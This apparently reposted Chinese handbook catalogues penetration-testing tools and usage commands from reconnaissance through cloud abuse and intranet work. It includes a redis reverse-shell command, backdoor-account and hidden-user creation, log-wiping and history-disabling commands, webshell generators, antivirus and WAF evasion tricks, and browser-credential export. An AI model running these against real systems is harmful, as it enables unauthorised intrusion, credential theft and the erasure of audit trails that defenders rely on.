万字手册带你了解渗透测试各阶段工具

Yikjiang2024-04-26文章来源:SecHub网络安全社区


信息收集

一、我们要收集什么

1712310645533843a760b70e74ce89d62d8054f7717f4.jpeg

二、公司信息收集

1、在线 查询

https://aiqicha.baidu.com/ 【爱企查】
https://icp.chinaz.com/ 【站长之家-备案查询】
https://www.xiaolanben.com/ 【小蓝本-查询公众号小程序】
http://finger.tidesec.com/ 【指纹识别】
https://site.ip138.com/ 【IP及C段查询】

2、工具查询备案信息

2.1、EnScan-Go

https://github.com/wgpsec/ENScan_GO

a.介绍

用于企业信息的全面爬取,给予程序一个或多个企业名称,程序自动从爱企查、企查查、天眼查、微信公众号、APP应用商店、招聘网站中爬取跟目标企业有关的所有信息,并支持聚合导出。

b.登陆配置

打开爱企查,登陆后复制Cookie,添加到对应配置文件中。

171232828794789999c6c088540edb5923c53514904a9.png

c.常用命令
.\enscan-0.0.15-windows-amd64.exe -n XX有限公司 -invest 50 --deep 2 --branch 

    -n 公司名
    -invest 	投资比例
    --deep  	递归搜索n层公司
    --branch    查询分支机构(分公司)信息
d.效果展示

1712330464181d71690c902ad43dab7d3ab0c664fb696.png

171233047180462c33e15b09d4c66bbad8041b2d2b0e7.png

3、社工信息收集

邮箱收集

在线网址

https://www.skymem.info/

https://app.snov.io/

工具

171240459645689dcfe5e7c294cbcb03c32f86611e66b.png

手机号、学号、工号收集

可以使用Google语法进行收集,这里以学校信息为例

site:域名 intext:学号
site:域名 intext:手机号
title:学校名称 intext:获奖

三、子域名收集

1、搜索引擎查找

FOFA(https://fofa.so/) title="公司名称" ; domain="sgcc.com.cn"  
Hunter(https://hunter.qianxin.com/) domain="sgcc.com.cn"

钟馗之眼(https://www.zoomeye.org/) site=域名即可 ;hostname:sgcc.com.cn
shodan(https://www.shodan.io/):hostname:"sgcc.com.cn"
360测绘空间(https://quake.360.cn/) :domain:"sgcc.com.cn"

百度(https://www.baidu.com/s):intitle=公司名称;site:sgcc.com.cn
Google(https://www.google.com/):intitle=公司名称;site:sgcc.com.cn

2、在线查询

https://z.zzwa.org.cn/
http://z.zcjun.com/
https://www.dnsgrep.cn/subdomain 

3、工具推荐

OneForAll

介绍

OneForAll是一款由shmilylty在Github上开源的子域收集工具,它被设计用来在渗透测试的信息收集阶段中,高效地收集和分析子域名。这个工具通过多种方式来收集子域,包括但不限于利用证书透明度、常规检查、网上爬虫档案、DNS数据集、DNS查询、威胁情报平台数据以及搜索引擎发现子域等方法

常用命令
// 扫描单个目标
python3 .\oneforall.py --target sjtu.edu.cn  run

//扫描多个目标
python3 .\oneforall.py --targets <target.txt>  run
效果图

1712333786470c3978ee5bb5148c884b86b52c19f42f3.png

SubDomainsBrute

介绍

subdomainsBrute是一款用Python编写的子域名爆破工具。它可以根据提供的字典文件,快速扫描给定域名可能存在的子域名。该工具使用多线程技术进行扫描,提高了扫描效率,并支持将结果输出到文件中以便进一步处理和分析。

常用命令
python .\subDomainsBrute.py baidu.com -o baidu.txt
效果图

1712333823371fb024ce1199d46c18448c46f783724d2.png

四、目录扫描

在渗透测试中,目录扫描是一个非常重要的步骤,通过目录扫描可以扫出来很多重要的资源,比如说网站的后台、备份文件、敏感目录。

7kbscan

https://github.com/7kbstorm/7kbscan-WebPathBrute

介绍

这是一个用来后台扫描的工具,其实跟御剑差不多,都属于图形化工具

效果图

171240108377503a063c6c45b40dfa2036e9f0f34ba2a.png

御剑

御剑是自动扫描网站目录,并且可以发现一些隐藏的文件和目录的扫描工具,它有简洁易懂的GUI界面。

介绍

https://github.com/foryujian/yjdirscan/releases

效果图

1712401198162a26a7f7d65e24ee8a440c0995915a8ab.png

dirsearch

https://github.com/maurosoria/dirsearch

介绍

dirsearch是一个使用python语言开发的目录扫描工具,可以扫描web应用的敏感文件和目录查找敏感信息;它支持多线程、多种后缀(-e|–extensions asp,php)、支持生成报告(纯文本,JSON)、支持暴力扫描、支持HTTP代理用户代理随机化等。

常用命令

建议在语句中添加-e*来扫描所有开发语言,可以让我们扫描的结果更加全面。

-u    指定网址,例如 http://www.xxx.com/
-l    指定url字典
-e    指定网站后端开发语言,如PHP、ASP、JSP等
-w    指定字典,如果不指定,默认使用db目录下dicc.txt
-r    递归目录,例如爆破出/static/目录则继续爆破/static/下级目录,直到无法爆破出其它目录为止
--random-agent    使用随机User-Agent
-o		输出报告
-X		排除状态代码,如404、400等
-i		指定状态代码,如404、300-399等
-t		设置线程数
--deep-recursive    对每个目录深度执行递归扫描
--minimal=LENGTH    最小响应长度
--maximal=LENGTH    最大响应长度
-q    安静模式
--no-color          无彩色输出
-m METHOD						HTTP方法(默认值:GET)
--max-rate=RATE     每秒最大请求数
--ip=IP             每当发生错误就退出
--max-rate=RATE     每秒最大请求数
--timeout=TIMEOUT   超时连接超时
--retries=RETRIES   重试失败请求的重试次数

效果图

在实战中,可以使用-x来排除指定的状态码、也可以使用-i来指定状态码。

171240109040023892ee0d8d3475ba18d9991fa84734f.png

五、端口扫描

Msscan

https://github.com/robertdavidgraham/masscan

介绍

Masscan是一款开源、高速的端口扫描工具,使用异步传输,以其卓越的性能和速度而闻名。

常用命令

msscan <目标> -p <端口号> -arte <线程> 
    -p <ports,--ports <ports>> 指定端口进行扫描
    --banners 获取banner信息,支持少量的协议
    --rate <packets-per-second> 指定发包的速率

效果图

171233197523403ef77af51d746119f5f0bd954ce0b73.png

RustScan

https://github.com/RustScan/RustScan

介绍

Rustscan是一款用Rust语言开发的高速端口扫描器,它可以在3秒内扫描所有65535个端口,并支持脚本引擎和自适应学习功能。它还可以自动将扫描结果导入Nmap,或者使用自定义的脚本进行进一步的操作,实测效果要好于Nmap、Msscan

常用命令

rustscan –a <IP>


-a 要扫描的 CIDR、IP 或主机的逗号分隔列表。
-b 端口扫描的批量大小
-p 要扫描的端口列表。示例:80、443、8080
-r 端口范围,格式为 start-end。示例:1-1000

效果图

171233324853823eadcfbdace46ea98a79b68f72aad69.png

六、指纹识别

人工识别

路径识别

宏景hr:/css/hcm/login.css
蓝凌OA:/scripts/jquery.landray.common.js
致远OA:/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif
齐治堡垒机:logo-icon-ico72.png|resources/themes/images/logo-login.png
泛微OA:/spa/portal/public/index.js

Icon识别

致远A8

1712334063394cbe19b5822484a8eade21c6950bbd469.png

泛微

17123340688166aa6620f55284af8b6d9b97853d8dc09.png

Jenkins

17123340849558f76084d70ef479c80a23a62427bed2f.png

界面识别

泛微

17123341307151e3f85d6a1564f8b9852e62fe0e699c0.png

若依

171233413877857bd421c7c9845a497698ac4d5a9411b.png

Ehole_Magic-Windows

介绍

在进行web打点时,信息收集中对目标进行指纹识别是必不可少的一个环节,使用EHole识别出来的重点资产还要用其他漏洞利用工具去检测,非常的不方便,在原本的基础上加了个漏洞检测功能。提打点的效率。(不影响原版功能的使用)

常用命令

搜索无结果 解决方案:如:将domain="baidu.com"改为domain=’“baidu.com”’

.\EHole_windows_amd64.exe finger -s "domain=sgcc.com.cn" 
ehole finger -l 1.txt  // 从文件中加载url扫描
ehole finger -u http://www.baidu.com // 单个url检测

-f  从fofa提取资产,进行指纹识别
-s  从fofa提取资产,进行指纹识别
-a  从hunter提取资产,进行指纹识别
-b  从hunter提取资产,进行指纹识别
-l  从本地文件读取资产,进行指纹识别
-o  输出所有结果
-t  指纹识别线程大小。 (default 100)

效果图

1712402175356e684b31029174de1b51af429f32b0085.png

在线网站

http://finger.tidesec.com/

1712402286003e04ddb5427b54b4db8c11f62df430257.png

七、综合工具

Fofa_View

介绍

集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看

效果图

17124022575708677e6bed1134de09197694fd2aa3913.png

Fscan

介绍

fscan 是一个内网综合扫描工具,方便一键自动化、全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

常用命令

.\fscan.exe -h <target> -p 0-65535 
.\fscan.exe -h 192.168.1.1/24 -p 0-65535
.\fscan.exe -hf <target.txt>

fscan.exe -h 192.168.1.1/24 -np -nopoc(跳过存活检测 、不进行poc攻击)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:8888 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)

效果图

1712402503931495be48ae64148d382bf905f789e5e0e.png

Fscanoutput

https://github.com/ZororoZ/fscanOutput/releases/download/v2.20/FscanOutput_v2.2.py

介绍

一个用于处理fsacn输出结果的小脚本(尤其面对大量资产的fscan扫描结果做输出优化,让你打点快人一步!!!),可将结果转换为xlsx,并且用不同的sheet展示不同的类型

常用命令

python3 fscanOutput.py result.txt

效果图

171240298872140b0f6c3a04b48ce82720da8422662d6.png

Searchall

介绍

在实战中进入内网的时候,大家需要搜集一些敏感信息例如账号,密码甚至浏览器的账号密码。searchall完美解决了这个问题。所以我就结合自身的经验写了一款搜索敏感信息的利用工具。它可以搜索敏感信息,更快为你获取到有价值的信息。

常用命令

Windows: searchall3.5.exe  -p D:/
Liunx : searchall3.5 -p

效果图

17124033725801dca4e6d0612461bae1e41e243a04c56.png

弱口令扫描工具

介绍

超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。

效果图

17124034478781868d2f339854e9c8d95edabc49957f6.png

WebBatchRequest

介绍

Web批量存活探测【JS泄露、漏洞挖掘】

效果图

171246412902090068900af5145bc846563c84c417dce.png

打点技巧

Fofa语法

  1. 集团信息、特征【body=“单位地址”、body=“联系人手机号”】

  2. Icon

    1. (icon_hash="-150497661" || icon_hash=“1048654568” || icon_hash="-1252041730" || icon_hash="-741674304") && country=“CN” && (icon_hash="-150497661" || icon_hash="-741674304")
    2. body=“电力” && (title=“系统” || title=“管理” || title=“后台” || title=“平台” || title=“应用” || title=“监测”) && is_domain=false && country=“CN” && (title!=“国务院国有资产监督管理委员会” && title!=“2022世界杯竞猜-世界杯比赛竞猜平台-世界杯竞猜官方网站” && title!=“华体汇平台app下载(中国)有限公司” &&title!=“emc易倍·(中国)官方平台”)

官网

拿到目标后第一时间去看它的官网,从官网就能了解这个单位有哪些下属单位,因为单位与单位之间的网络一般都是互通的。

171230968301942afc7bec3ec49a8b625c18d1fdede71.png

工具推荐

WebPack

在源码中可能存在敏感的API接口,可以直接看Js文件,也可以还原出来在本地查看。

1712405674934de47b2893cfc46b2a50e8cdf8d75eb7d.png

https://mp.weixin.qq.com/s/iVofTYArMBHzeSvWFzw-gw

WebPack本身作为一个资源管理和打包构建工作,其强大之处在于各种静态资源的依赖分析和预编译。经过WebPack编译后得到各种静态资源,通常生成dist文件夹,保存各种静态文件。其结构大致如下

1712224634170eff6b9783f474643955ed1690cd489bb.png

而app.js文件通常包含了各类前端路由或者后端API接口,是我们渗透前后端系统的突破口。当然不仅仅只是app.js中会存在。

Packer-Fuzzer

介绍

当我们发现网站使用WebPack进行打包的时候,即可使用该工具进行扫描。是一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具。支持自动模糊提取对应目标站点的API以及API对应的参数内容,并支持对:未授权访问、敏感信息泄露、CORS、SQL注入、水平越权、弱口令、任意文件上传七大漏洞进行模糊高效的快速检测。

常用命令

python3 PackerFuzzer.py -u https://target.com

效果图

可以生成HTML及Word报告

1712405560511c0a3742af18949ad8126e90e43e307e1.png

1712405583602bebc689803c64e1e8c1acaa7c1a8de46.png

171240574079414341644d58044849416c21b87d5279b.png

reverse-sourcemap

常用命令

.\reverse-sourcemap -v -o <output> <js.map>

17124549568142461b429337d4e5b88270f45eb7d3092.png

WebBatchRequest

介绍

WEB批量请求器(WebBatchRequest)是对目标地址批量进行快速的存活探测、Title获取,简单的banner识别,支持HTTP代理以及可自定义HTTP请求用于批量的漏洞验证等的一款基于JAVA编写的轻量工具。

效果图

1712406051259145b025ca6ae417083a167b116c35675.png

插件推荐

Google-FindSomething

https://github.com/momosecurity/FindSomething

JS泄露介绍

JavaScript作为一种相当简单但功能强大的客户端脚本语言,本质是一种解释型语言。所以,其执行原理是边解释边运行。上述特性就决定了JavaScript与一些服务器脚本语言(如ASP、PHP)以及编译型语言(如C、C++)不同,其源代码可以轻松被任何人获取到。

泄漏点

      • 泄露敏感API
      • 泄露用户名密码
      • 泄露AK/SK

工具介绍

FindSomething,基于浏览器插件的被动式信息提取工具,用于敏感信息查询【关键字段Username、Password、AK\SK】,通常可以配合URL批量检测工具进行测试。

效果图

17124119776057d9202c95cac442a9e6bc169ea129305.png

Burp-APIkit插件

https://github.com/API-Security/APIKit

介绍

可以主动/被动扫描发现应用泄露的API文档,并将API文档解析成BurpSuite中的数据包用于API安全测试

效果图

17124126738015a8f5fb513b74826961b0777b5aabc01.png

171241268442674853f93e3a14733989884cdab683f31.png

Burp-chunked-coding-converter

https://github.com/c0ny1/chunked-coding-converter

分块传输

分块传输编码(Chunked transfer encoding)是超文本传输协议(HTTP)中的一种数据传输机制,允许HTTP由应用服务器发送给客户端应用( 通常是网页浏览器)的数据可以分成多个部分。分块传输编码只在HTTP协议1.1版本(HTTP/1.1)中提供。通常,HTTP应答消息中发送的数据是整个发送的,Content-Length消息头字段表示数据的长度。数据的长度很重要,因为客户端需要知道哪里是应答消息的结束,以及后续应答消息的开始。然而,使用分块传输编码,数据分解成一系列数据块,并以一个或多个块发送,这样服务器可以发送数据而不需要预先知道发送内容的总大小。通常数据块的大小是一致的,但也不总是这种情况。

一般情况HTTP请求包的Header包含Content-Length域来指明报文体的长度。有时候服务生成HTTP回应是无法确定消息大小的,比如大文件的下载,或者后台需要复杂的逻辑才能全部处理页面的请求,这时用需要实时生成消息长度,服务器一般使用chunked编码。在进行Chunked编码传输时,在回复消息的Headers有Transfer-Encoding域值为chunked,表示将用chunked编码传输内容。

这在http协议中也是个常见的字段,用于http传送过程的分块技术,原因是http服务器响应的报文长度经常是不可预测的,使用Content-length的实体搜捕并不是总是管用。

分块技术的意思是说,实体被分成许多的块,也就是应用层的数据,TCP在传送的过程中,不对它们做任何的解释,而是把应用层产生数据全部理解成二进制流,然后按照MSS的长度切成一分一分的,一股脑塞到tcp协议栈里面去,而具体这些二进制的数据如何做解释,需要应用层来完成。

工具介绍

手工分块传输的话,比较繁琐,在实战中,可以先使用插件进行快速测试,此插件可以一键进行分块传输

效果图

17124132656910a44fe99ea634c68bc8abafcaff31e39.png

原始数据

1712413437990f8aeae97a61347838aceeed0449e6b70.png

分块传输后数据

1712413314800f03375b0c6fe4653a671ea425c0c8ebe.png

Google-SuperSearchPlus

工具介绍

浏览器插件支持自动联动页面URL进行查询,支持资产归属、权重信息、备案信息、资产测绘。

效果图

1712415237455866c979e52ed4b2885244d2a056d6aea.png

17124152532798964e14383734cb897f216166c9f3052.png

Heimdallr&Anti-HoneyPot

蜜罐

https://mp.weixin.qq.com/s/L3XUy3H3pAY1gRMUqnAdCw

https://mp.weixin.qq.com/s/0iI48ZvgS2G1G8EMQdZzbA

17124166498248c85abdd357c4d7a94b9d0687808ffa9.png

171241662862709baac415f544c0db5bafa04f26bc464.png

蜜罐是什么

蜜罐是一种主动防御技术,通过主动的暴露一些漏洞、设置一些诱饵来引诱攻击者进行攻击,从而可以对攻击行为进行捕获和分析。可以实现对攻击者的主动诱捕,能够详细地记录攻击者攻击过程中的许多痕迹,可以收集到大量有价值的数据,如病毒或蠕虫的源码、黑客的操作等,从而便于提供丰富的溯源数据。

蜜罐的分类
  • 低交互蜜罐

    • 通常是指与操作系统交互程度较低的蜜罐系统,仅开放一些简单的服务或端口,用来检测扫描和连接,这种容易被识别。
  • 中交互蜜罐

    • 介于低交互式和高交互式之间,能够模拟操作系统更多的服务,让攻击者看起来更像一个真实的业务,从而对它发动攻击,这样蜜罐就能获取到更多有价值的信息。
  • 高交互蜜罐

    • 指的是与操作系统交互很高的蜜罐,它会提供一个更真实的环境,这样更容易吸引入侵者,有利于掌握新的攻击手法和类型,但同样也会存在隐患,会对真实网络造成攻击。
Web站点蜜罐

web蜜罐收集个人信息使用的技术主要是JSONP劫持。

17124174187637ae219e01e6244ad871e6893e6fd5a8d.png

Mysql蜜罐
原理

Mysql蜜罐是利用Mysql读取本地文件存储到数据库中的功能,进行信息收集,其主要利用的函数是Local_Date、Local_Infile。

查看

可以查看这个功能默认是关闭查看是否开启

show global variables like 'local_infile';

set global local_infile=1; #开启
利用

读取微信号

  • 通过C:/Windows/PFRO.log获取windows用户名
  • 通过C:/Users/用户名/Documents/WeChat Files/All Users/config/config.data获取wxid

工具介绍

Heimdallr

Heimdallr是一款致力于被动嗅探浏览器流量,提示高危资产指纹和蜜罐特征,并进行拦截告警的谷歌插件,还可以用于对浏览器特征追踪(evercookie、webRTC、Canvas画布等)的对抗。

17124162905943e8ca08411394764b8c5fcb9a157af2e.png

Anti-HoneyPot

插件有两个功能,一是识别当前访问的网站是否是蜜罐,是的话就弹框预警;二是对访问的jsonp接口进行重置,防止对方获取到真实ID

1712416262986a79fa3aff70c420c9339519dff317d26.png

Burp-Hae

HaE是基于 BurpSuite Java插件API 开发的请求高亮标记与信息提取的辅助型框架式插件,该插件可以通过自定义正则的方式匹配响应报文或请求报文,并对满足正则匹配的报文进行信息高亮与提取。

171245355076412c717e6149f409896abb7e6f3327659.png

Google-Awvs_AutoScan_Google

Google浏览器插件,右键调用AWVS进行漏洞扫描

17124537918966c610254a336432d88fc2b05c1b3b895.png

Google-Source detecotoe

SourceDetector是一个谷歌浏览器插件,这个插件可以自动的判断网站是否存在js.map文件,并且能够利用该插件直接下载到js.map的Vue源码。

1712454012413dc44a5e35d9943cd95fc68f3c002de60.png

HackBrowserData

HackBrowserData 是一个浏览器数据(密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件)的导出工具,支持全平台主流浏览器。

17124531063947daeb6608b6244dc9e44b5067c78cc0d.png

漏洞利用

POC-bomber

可以配合Fscan、Subdomain等工具,进行扫描,如果成功的话会显示success,当扫描出漏洞后,可以收工复现或使用–poc参数进行验证。

可以配合Fofa语句等,批量刷CNVD事件型漏洞

header="Thinkphp" && status_code="200" is_domain=true
//制定文件扫描,目标Url需要添加http://
python pocbomber.py -f <target.txt> 

//制定Poc攻击
python pocbomber.py -f <target.txt> --poc="thinkphp2_rce.py"

//默认不生成报告,需要加-o参数

Afrog

介绍

afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描工具,PoC 包含 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。

常用命令

扫描单个目标:afrog -t http://example.com -o result.html
扫描多个目标:afrog -T urls.txt -o result.html
在线升级:afrog --up

效果图

171245775178067e56702ecea4c2f95796f32e5c8379c.png

生成HTML报告

17124579493350b3e874380904fffa37abf4025d71c6a.png

Nuclei

介绍

使用Go语言开发的基于Yaml语言的漏洞扫描器

常用命令

// 可以使用此命令进行手动更新,也可以等待Nuclei24小时自动更新。
nuclei -update

扫描单个目标:nuclei -u https://example.com 
扫描多个目标: nuclei –l <资产.txt>

-o 输出发现的问题

效果图

1712459029625110787b7e9374110a7b44d5757aff1af.png

输出报告

1712459136634f5800fdd51874ffb9fadfd9a594a1ccb.png

Goby

介绍

Goby是是一个图形化的漏洞扫描工具,他的便捷在于集成漏扫工具,支持大量插件,并且可以让新手自定义poc,大大降低了黑客的入门门槛。

使用步骤

添加扫描任务

1712459876554402bc333bd524fefb4c1ba8b8979e2ae.png

支持添加插件

171246020206725f00f98d4cb4a06ab440ed25d6358f4.png

headhost漏扫检测工具

17124599846131c385a8e79b74110856177b53e3011cd.png

效果图

1712459808584dcf2fe99e32f4ef291dc75edf1416645.png

Gr33k漏洞利用工具

介绍

综合漏洞检测、支持Weblogic、Struts2、Jboss、Apache、Tomat漏洞检测、目录扫描、端口扫描等功能,更多使用端口扫描功能,扫描线程低,丢包情况较低,缺点就是速度比较慢。

效果图

171246052409404f04ac7b5344bbcb94aa79b43068dff.png

红蓝对抗OA系统漏洞利用

介绍

集成各种OA漏洞,当我们前期收集到指纹信息后,可以利用此OA综合利用工具进行测试;也可用于漏洞批量检测。

效果图

1712460762244906f1987278e40a49091f56bfa57f540.png

0Day_2023_by银遁安全V1.8

介绍

漏洞利用工具,漏洞多为23hw期间高危漏洞。

效果图

17124610597895b849aad857f47e08631131eff056196.png

Webshell_Generate

https://github.com/cseroad/Webshell_Generate

介绍

支持各个语言的CMD、蚁剑、哥斯拉、冰蝎的Webshell,也添加了简单的免杀

效果图

171246930506274f03856e8974506a2ac7796df2a9966.png

Nacos

介绍

Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos配置文件中可能包含大量敏感信息,例如AK/SK、Mysql账号密码、Mssql数据库账号密码。

常见漏洞

CVE-2021-29441 Nacos权限认证绕过漏洞

secret.key 默认密钥 CNVD-2023674205

默认口令【Nacos】

NacosExploitGUI_v3.9

https://github.com/charonlight/NacosExploitGUI/releases

介绍

集成Nacos常见漏洞,有图形化界面,效果直观,支持批量检测,在填写URL的时候只需要填写目标,无需添加后续路径。

效果图

171247160252027302952e76044e5be5e6086e23a284a.png

HKEcho_Nacos

介绍

基于Python开发的Nacos漏洞利用工具,当存在任意用户添加或JWT硬编码绕过的漏洞时,会自动添加账号。

常用命令
//检测单个目标
python HKEcho_Nacos.py -u http://192.2xx.2xx.1x:8848

//检测多个目标
python HKEcho_Nacos.py -f target.txt
效果图

1712471699718e932a1fba8b14fca803774ca27087ca5.png

Shiro

介绍

Apache Shiro是用来做认证和授权的框架,执行身份验证、授权、密码和会话管理。

漏洞

Shiro从诞生指出到现在为止,共爆出14个漏洞,其中比较常见的为Shiro550漏洞

Shiro550漏洞

shiro-550主要是由shiro的rememberMe内容反序列化导致的命令执行漏洞,造成的原因是默认加密密钥是硬编码在shiro源码中,任何有权访问源代码的人都可以知道默认加密密钥。于是攻击者可以创建一个恶意对象,对其进行序列化、编码,然后将其作为cookie的rememberMe字段内容发送,Shiro 将对其解码和反序列化,导致服务器运行一些恶意代码。

shiro_attack-4.5.6-SNAPSHOT-all

https://github.com/SummerSec/ShiroAttack2/releases

介绍

shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)

效果图

17124742836287a442feda61347758dee14333cb69779.png

shiro_tool

介绍

当我们拿到Key的时候,但是没有利用链的时候,可以使用此工具进行测试。

常用命令
java -jar shiro_tool.jar <target.txt>
效果图

1712476665019194f5b84057340168a488681ebc45c5b.png

工具箱&&渗透系统

onefox工具箱

介绍

基于Python的工具合集

界面图

171247673418671e6542ca87a499dbaf18c0b01f16583.png

Windows11渗透测试系统

https://github.com/arch3rPro/Pentest-Windows/

171247678556490167aa934944b5087d390e500de3091.png

云上攻防

https://lzcloudsecurity.gitbook.io/

发现点

  1. APP/小程序反编译
  2. JS泄露
  3. Nacos配置文件
  4. spring-heapdump泄露

利用工具

  1. 行云管家

https://yun.cloudbility.com/login.html

  1. Cf
  2. 云资产管理工具

AK/SK认证

云主机通过使用Access Key Id / Secret Access Key加密的方法来验证某个请求的发送者身份。Access Key Id(AK)用于标示用户,Secret Access Key(SK)是用户用于加密认证字符串和云厂商用来验证认证字符串的密钥,其中SK必须保密。 AK/SK原理使用对称加解密

大部分的云主机都支持AK/SK都认证方式,用于API调用等功能,由于开发的不规范,以及一些其它漏洞,可能会导致AK/SK泄露。在渗透中,如果发现目标泄露了AK/SK,可以通过AK/SK直接攻击其对应的云服务器。

阿里云

RDS

关系数据库服务(Relational Database Service,RDS)是一种稳定可靠、可弹性伸缩的在线数据库服务

RDS 采用即开即用的方式,兼容 MySQL、SQL Server 两种关系数据库,并提供数据库在线扩容、备份回滚、性能检测及分析等功能

ECS

云服务器(Elastic Compute Service,ECS)与传统数据中心机房的服务器相似,云服务器部署在云端,由云服务商直接提供底层硬件环境

OSS

对象存储服务(Object Storage Service,OSS)是阿里云对外提供的海量、安全和高可靠的云存储服务

CF使用手册

配置访问配置

cf config

1712493186368a71aa46270e349f587f736b097a498f0.png

一键列出当前访问凭证的权限

cf alibaba perm

17124932405718bea872619fb498f9410d6bc043d9f77.png

一键接管控制台,会添加后门账号

cf alibaba console

17124932816911c19170c33204a3495eb43694eec1a3e.png

一键列出当前访问凭证的云服务资源

cf alibaba ls

一键为所有实例执行三要素【whoami、id、hostname、ifconfig】,方便 HVV

1712493363973c696ad98f7404b868ea94c519aa4022a.png

在i-abcdefghijklmn实例上执行命令,在 CF 中 Windows 系统默认会以 bat 脚本执行命令,如果想执行 PowerShell 下的命令,可以使用 -s ps 参数

cf alibaba ecs exec -c whoami -i i-abcdefghijklmn

云资产管理工具

介绍

支持七牛云、MinIo AK\SK利用

界面图

17124954573411bf8ce1a4bbe494fa328387125bb804e.png

内网渗透

https://mp.weixin.qq.com/s/wz0wu25lyLSDbNbnqxg65g

内网基础

https://mp.weixin.qq.com/s/D6MGPA7uNJhww68dNNkajA

域(Domain)是一个有安全边界的计算机集合(安全边界意思是在两个域中,一个域中的用户无法访问另一个域中的资源),可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个更加严格的安全管理控制机制,如果你想访问域内的资源,必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。

域控

域控制器(Domain Controller,简写为DC)是一个域中的一台类似管理服务器的计算机,相当于一个单位的门卫一样,它负责每一台联入的电脑和用户的验证工作,域内电脑如果想互相访问首先都是经过它的审核。

用户与用户组

权限介绍

在Windows中,权限大概分为4种,分别是User、Aministrator、System、Trustedinstaller。

在四种权限中,我们经常接触的是第三种。

User:普通用户权限,是系统中最安全的权限

Aministrator:管理员权限。可以利用Windows的机制将自己提升为System权限,以便操作SAM文件等。

System:系统权限。可以对SAM等敏感文件进行读取,往往需要将Administrator权限提升到System权限才可以对散列值进行Dump操作。

TrustedInstaller:Windows中的最高权限。对系统文件,即使拥有System权限也无法进行修改。只有拥有TrustedInstaller权限的用户才可以修改系统文件。

低权限级别将使渗透测试受到很多限制。在Windwos中,如果没有管理员权限,就无法进行获取散列值、安装软件、修改防火墙规则、修改注册表等操作。

用户相关命令

net user //查看本机用户
net user admin //查看本机admin用户的相关信息
net user admin password /add //增加账号为admin用户,密码为password的账户加入本地
net user admin /del //删除本机的admin用户
net user admin$ password /add //增加账号为admin用户,密码为password的账户加入本地(区别是它是隐藏命令)

信息收集

查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞:

systeminfo

1712289219218a1c1d7cbd6ba4dbb8b7d6941448eb036.png

查看进程

tasklist

1712289322832b2fafc8d681641caa1f24ec0e0d79e1e.png

查看端口开放情况

netstat -ano

1712289408726d830816ce18c40659325d075f0f21aa0.png

查看域控

whoami
// 存在域的话显示格式为:域名\计算机名	
ipconfig /all #域中一般存在DNS服务器
net view /domain
net time /domain
找不到域:不存在域
发生系统错误5:存在域,但是用户不在域中
直接显示时间:存在域并且在域中

net user /domain #查看域中的用户,可以收集当作用户名字典

#定位域控
ping 域时间服务器
nslookup 域名

1712303984238d75ee75d5dcf4106880b5a1b6b8f52f9.png

1712304033525010181e6deb54aa9b936c120c26f7669.png

17123042679057bf49166a6114c78a869da526ed79453.png

17123070161740cad12950a6f466eb3d8b70d447ce296.png

痕迹清理

1、拿到Liunx的Webshell后,第一步干什么

执行此语句后,执行的命令便不会被记录

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

正常状态

171215292359488f0b4b736e94974a3226fd65c158d5c.png

执行命令后

1712152958614f8f900604ca94df6a7712377312075dd.png

2、清除登录日志

清除登录失败的记录

echo > /var/log/btmp 
lastb //查询不到登录失败信息

echo > /var/log/wtmp 	
last //查询不到登录成功的信息

清除用户最后一次登录时间:echo > /var/log/lastlog          #lastlog命令
清除当前登录用户的信息:echo >   /var/log/utmp             #使用w,who,users等命令
清除安全日志记录:cat /dev/null >  /var/log/secure
清除系统日志记录:cat /dev/null >  /var/log/message

渗透小技巧

免杀

修改不常见的后缀当exe执行,如scr、com等

17122233142252124316adfed4f3a85f2221b289f8bb8.png

WAF绕过

文件上传去掉分号,绕过Waf

1712496890934127c9a123a8147159b2340c82a60b5fe.png

Conten-Disposttion双写

17124969099289bdfacacd4384909802fb37703aefb52.png

Shiro畸形头

修改请求头,例如【GeT、sadasd、PoST】,不会影响Shiro框架对数据包的处理

17122278727766b415354e56d492a8bdb6f0afd42b288.png

1712227880420f186a7ddf9144b9bb548a645197cec8c.png

修改Cookie的拼写

17122278975038c418ed1006b45d89d2808a1839850eb.png

弱口令

